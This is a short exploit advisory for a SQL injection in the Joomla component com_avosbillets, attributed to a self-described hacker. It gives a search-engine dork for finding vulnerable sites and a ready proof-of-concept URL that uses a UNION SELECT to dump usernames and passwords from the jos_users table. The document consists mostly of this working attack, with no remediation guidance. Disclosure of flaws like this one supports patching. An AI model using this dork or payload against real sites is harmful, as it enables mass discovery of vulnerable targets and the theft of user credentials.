#-------------------------------------------------------- #Joomla (com_avosbillets) SQL injection Vulnerability #-------------------------------------------------------- #Discovered By: Snakespc ALGERIAN HaCkEr #Mail: snakespc@gmail.com #site:anti-sec.info/vb/index.php #------------------------------------------------------- #Dork:inurl"com_avosbillets" #Exploit: #-------- #PoC: #http://server/index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users-- ----------------------------------------------------------